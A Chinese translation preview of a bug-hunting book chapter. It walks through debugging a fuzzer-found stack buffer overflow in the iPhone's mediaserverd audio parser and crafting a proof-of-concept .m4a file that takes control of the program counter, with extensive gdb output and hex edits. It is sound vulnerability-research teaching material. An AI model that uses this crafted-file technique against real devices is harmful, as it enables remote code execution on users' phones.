图灵社区按

TEAP是什么?TEAP是Turingbook Early Access Program的简称,即早期试读,它公布的是图灵在途新书未经编辑的内容。一本书的翻译周期约为3到6个月,如果在翻译过程中,译者就能与读者进行沟通和交流,对整本书的翻译品质是有帮助的。通过TEAP,读者可以提前阅读将来才能出版的内容,译者也能收获宝贵的反馈意见,改进翻译,提高质量。

本书原名为《A Bug Hunter's Diary》,中文暂定名为《捉虫日记》。
本篇选自第8章第二节。
任何意见、建议,都非常感谢能联系我,我的微博@loveisbug

上篇:捉虫日记之“铃音大屠杀”(1)

铃音大屠杀

8.2 崩溃分析及利用

fuzz程序处理完所有的测试用例之后,我就在web服务器的访问日志中搜索“BUG_FOUND”条目。

linux$ grep BUG /var/log/apache2/access.log
192.168.99.103 .. "GET /BUG_FOUND_file40.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
192.168.99.103 .. "GET /BUG_FOUND_file41.m4a HTTP/1.1" 404 276 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
192.168.99.103 .. "GET /BUG_FOUND_file42.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
[..]

如节选的日志文件所示,mediaserverd在试图播放测试用例文件40、41和42时遇到错误。为了分析它的崩溃,我重启了手机,并且把GNU调试器(见附录B.4)附加到mediaserverd:

跟多数移动设备一样,iPhone使用ARM CPU。这一点非常重要,因为ARM汇编语言和Intel汇编很不一样。

iphone# uname -a
Darwin localhost 9.4.1 Darwin Kernel Version 9.4.1: Mon Dec 8 20:59:30 PST 2008;
root:xnu-1228.7.37~4/RELEASE_ARM_S5L8900X iPhone1,1 arm M68AP Darwin

iphone# id
uid=0(root) gid=0(wheel)

iphone# gdb -q

启动gdb之后,用以下命令得到mediaserverd的当前进程ID:

(gdb) shell ps -u mobile -O pid | grep mediaserverd
27 ?? Ss 0:01.63 /usr/sbin/mediaserverd

然后在调试器中加载mediaserverd二进制文件,并把调试器附加到进程上:

(gdb) exec-file /usr/sbin/mediaserverd
Reading symbols for shared libraries ......... done

(gdb) attach 27
Attaching to program: `/usr/sbin/mediaserverd', process 27.
Reading symbols for shared libraries ................................. done
0x3146baa4 in mach_msg_trap ()

继续执行mediaserverd之前,用follow-fork-mode命令告诉调试器跟踪子进程,而不是父进程:

(gdb) set follow-fork-mode child

(gdb) continue
Continuing.

打开手机上的移动版Safari,指向编号40的测试用例文件(file40.m4a)的URL。调试器输出以下结果:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x01302000
[Switching to process 27 thread 0xa10b]
0x314780ec in memmove ()

崩溃发生在mediaserverd试图访问地址0x01302000处的内存时。

(gdb) x/1x 0x01302000
0x1302000: Cannot access memory at address 0x1302000

如调试器输出所示,mediaserverd试图引用未映射的内存位置时崩溃。为了进一步分析,我打印了当前的调用栈:

(gdb) backtrace
#0 0x314780ec in memmove ()
#1 0x3493d5e0 in MP4AudioStream::ParseHeader ()
#2 0x00000072 in ?? ()
Cannot access memory at address 0x72

这个输出很有趣。栈帧#2的地址是一个不常见的值(0x00000072),看上去像是栈已遭破坏。我用以下命令打印MP4AudioStream::ParseHeader()执行的最后一条指令(见栈帧#1):

(gdb) x/1i 0x3493d5e0 - 4
0x3493d5dc <_ZN14MP4AudioStream11ParseHeaderER27AudioFileStreamContinuation+1652>:
bl 0x34997374 <dyld_stub_memcpy>

MP4AudioStream::ParseHeader()执行的最后一条指令是调用memcpy(),一定是它导致了崩溃。此时此刻,这个bug展示了栈缓冲区溢出漏洞的所有特征(见附录A.1)。

我停止了调试会话,重启设备。手机重启后,再次把调试器附加到mediaserverd上,这一次我在MP4AudioStream::ParseHeader()调用memcpy()的地方也定义了一个断点,以评估传给memcpy()的参数:

(gdb) break *0x3493d5dc
Breakpoint 1 at 0x3493d5dc

(gdb) continue
Continuing.

我在移动版Safari中打开编号为40的测试用例(file40.m4a)以触发这个断点:

[Switching to process 27 thread 0x9c0b]

Breakpoint 1, 0x3493d5dc in MP4AudioStream::ParseHeader ()

memcpy()的参数通常保存在r0寄存器(目标缓冲区)、r1寄存器(源缓冲区),以及r2寄存器(拷贝的字节数)中。从调试器中得到这些寄存器的当前值。

(gdb) info registers r0 r1 r2
r0 0x684a38 6834744
r1 0x115030 1134640
r2 0x1fd0 8144

我也检查了寄存器r1指向的数据,看memcpy()的源数据是不是用户可控的:

(gdb) x/40x $r1
0x115030:     0x00000000 0xd7e178c2 0xe5e178c2 0x80bb0000
0x115040:     0x00b41000 0x00000100 0x00000001 0x00000000
0x115050:     0x00000000 0x00000100 0x00000000 0x00000000
0x115060:     0x00000000 0x00000100 0x00000000 0x00000000
0x115070:     0x00000000 0x00000040 0x00000000 0x00000000
0x115080:     0x00000000 0x00000000 0x00000000 0x00000000
0x115090:     0x02000000 0x2d130000 0x6b617274 0x5c000000
0x1150a0:     0x64686b74 0x07000000 0xd7e178c2 0xe5e178c2
0x1150b0:     0x01000000 0x00000000 0x00b41000 0x00000000
0x1150c0:     0x00000000 0x00000000 0x00000001 0x00000100

然后在编号为40的测试用例文件中搜索这些值。在文件的开头找到了它们,格式为小端表示法:

[..]
00000030h: 00 00 00 00 C2 78 E1 D7 C2 78 E1 E5 00 00 BB 80 ; ....Âxá×Âxáå..»€
00000040h: 00 10 B4 00 00 01 00 00 01 00 00 00 00 00 00 00 ; ..´.............
00000050h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................
00000060h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................
00000070h: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 ; ....@...........
[..]

因此我可以控制内存拷贝的源数据。继续执行mediaserverd,在调试器中得到以下输出:

(gdb) continue
Continuing.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00685000
0x314780ec in memmove ()

mediaserverd在试图访问未映射内存时再次崩溃。看上去似乎是传给memcpy()的字节数参数太大了,因此这个函数试图拷贝的音频文件数据超出了栈帧底。这时我停下调试器,用十六进制编辑器打开导致崩溃的那个测试用例文件(file40.m4a):

00000000h: 00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00 ; ... ftypM4A ....
00000010h: 4D 34 41 20 6D 70 34 32 69 73 6F 6D 00 00 00 00 ; M4A mp42isom....
00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 00 6C 6D 76 68 64 ; ...emoovÿ..lmvhd
[..]

在文件偏移40(0x28)处可以找到被改动过并导致了崩溃的字节(0xff)。我查了下“QuickTime文件格式规范(QuiteTime File Format Specification) 7”,确定了文件结构中那个字节的作用。按照规范的描述,针对一种“movie header atom”,该字节是其大小的一部分,所以fuzz程序一定是改变了这个atom的大小值。就像我之前说的,传给memcpy()的值太大,mediaserverd在试图拷贝这么多数据到栈上时崩溃了。为了避免这个崩溃,我把atom的大小设为一个较小的值,并把文件偏移40处那个改动过的值改回0x00,偏移42处的值改回0x02。

下面是原来的编号40测试用例文件(file40.m4a):

00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 00 6C 6D 76 68 64 ; ...emoovÿ..lmvhd

而以下是新的测试用例文件(file40_2.m4a),下划线标识改动的值:

00000020h: 00 00 1C 65 6D 6F 6F 76 00 00 02 6C 6D 76 68 64 ; ...emoovÿ..lmvhd

重启设备以得到干净的环境,再次把调试器附加到mediaserverd上,从移动版Safari中打开这个新文件。

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000072
[Switching to process 27 thread 0xa10b]
0x00000072 in ?? ()

这一次程序计数器(指令指针)被篡改为指向地址0x00000072。我停下调试会话,开启一个新的会话,再次在Mp4AudioStream::ParseHeader()调用memcpy()的地方设置一个断点:

(gdb) break *0x3493d5dc
Breakpoint 1 at 0x3493d5dc

(gdb) continue
Continuing.

在移动版Safari中打开改动后的测试用例文件file40_2.m4a时,调试器输出以下内容:

[Switching to process 71 thread 0x9f07]

Breakpoint 1, 0x3493d5dc in MP4AudioStream::ParseHeader ()

打印当前的调用栈:

(gdb) backtrace
#0 0x3493d5dc in MP4AudioStream::ParseHeader ()
#1 0x3490d748 in AudioFileStreamWrapper::ParseBytes ()
#2 0x3490cfa8 in AudioFileStreamParseBytes ()
#3 0x345dad70 in PushBytesThroughParser ()
#4 0x345dbd3c in FigAudioFileStreamFormatReaderCreateFromStream ()
#5 0x345dff08 in instantiateFormatReader ()
#6 0x345e02c4 in FigFormatReaderCreateForStream ()
#7 0x345d293c in itemfig_assureBasicsReadyForInspectionInternal ()
#8 0x345d945c in itemfig_makeReadyForInspectionThread ()
#9 0x3146178c in _pthread_body ()
#10 0x00000000 in ?? ()

列表中第一个栈帧就是我要找的。我用如下命令显示Mp4AudioStream::ParseHeader()的当前栈帧信息:

(gdb) info frame 0
Stack frame at 0x1301c00:
pc = 0x3493d5dc in MP4AudioStream::ParseHeader(AudioFileStreamContinuation&); saved
pc 0x3490d748
called by frame at 0x1301c30
Arglist at 0x1301bf8, args:
Locals at 0x1301bf8, Saved registers:
r4 at 0x1301bec, r5 at 0x1301bf0, r6 at 0x1301bf4, r7 at 0x1301bf8, r8 at →
0x1301be0, sl at 0x1301be4, fp at 0x1301be8, lr at 0x1301bfc, pc at 0x1301bfc,
s16 at 0x1301ba0, s17 at 0x1301ba4, s18 at 0x1301ba8, s19 at 0x1301bac, s20 at →
0x1301bb0, s21 at 0x1301bb4, s22 at 0x1301bb8, s23 at 0x1301bbc,
s24 at 0x1301bc0, s25 at 0x1301bc4, s26 at 0x1301bc8, s27 at 0x1301bcc, s28 at →
0x1301bd0, s29 at 0x1301bd4, s30 at 0x1301bd8, s31 at 0x1301bdc

最有趣的信息是程序计数器(pc寄存器)的值保存在栈上的位置。如调试器输出所示,pc保存在栈上地址为0x1301bfc的地方(见“Saved registers”)。

然后继续执行该进程:

(gdb) continue
Continuing.

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000072
0x00000072 in ?? ()

崩溃后,我查看MP4AudioStream::ParseHeader()之前保存程序计数器的栈位置(内存地址0x1301bfc),函数期望从这里找回程序计数器。

(gdb) x/12x 0x1301bfc
0x1301bfc: 0x00000073 0x00000000 0x04000001 0x0400002d
0x1301c0c: 0x00000000 0x73747328 0x00000063 0x00000000
0x1301c1c: 0x00000002 0x00000001 0x00000017 0x00000001

调试器的输出显示保存的指令指针被数值0x00000073覆写。函数试图把它返回给自己的调用函数时,这个改动过的值赋给了指令指针(pc寄存器)。特别地,由于ARM CPU的指令对齐(指令按16位或32位边界对齐)机制,拷贝到指令指针的是0x00000072,而不是文件中的0x00000073。

这个极其简单的fuzz程序确实从iPhone的音频库中发现了一处典型的栈缓冲区溢出。我在测试用例文件里搜索调试器输出的字节模式,在文件file40_2.m4a偏移量为500的地方找到了这个字节序列:

000001f0h: 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00 04 ; .stts...........
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 00 ; -.......(stsc...
00000210h: 00 00 00 00 02 00 00 00 01 00 00 00 17 00 00 00 ; ................

然后我把上面下划线处的值改为0x44444444,新文件命名为poc.m4a

000001f0h: 18 73 74 74 44 44 44 44 00 00 00 00 01 00 00 04 ; .sttDDDD.........
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 00 ; -.......(stsc...
00000210h: 00 00 00 00 02 00 00 00 01 00 00 00 17 00 00 00 ; ................

再次把调试器附加到mediaserverd上,在移动版afari中打开新文件poc.m4a,调试器输出如下:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44444444
[Switching to process 77 thread 0xa20f]
0x44444444 in ?? ()

(gdb) info registers
r0 0x6474613f 1685348671
r1 0x393fc284 960479876
r2 0xcb0 3248
r3 0x10b 267
r4 0x6901102 110104834
r5 0x1808080 25198720
r6 0x2 2
r7 0x74747318 1953788696
r8 0xf40100 15991040
r9 0x817a00 8485376
sl 0xf40100 15991040
fp 0x80808005 -2139062267
ip 0x20044 131140
sp 0x684c00 6835200
lr 0x1f310 127760
pc 0x44444444 1145324612
cpsr {0x60000010, n = 0x0, z = 0x1, c = 0x1, v = 0x0, q = 0x0, j = 0x0, ge
= 0x0, e = 0x0, a = 0x0, i = 0x0, f = 0x0, t = 0x0, mode = 0x10} {0x60000010, n
= 0, z = 1, c = 1, v = 0, q = 0, j = 0, ge = 0, e = 0, a = 0, i = 0, f = 0, t = 0,
mode = usr}

(gdb) backtrace
#0 0x44444444 in ?? ()
Cannot access memory at address 0x74747318

耶!这时,我完全控制了程序计数器。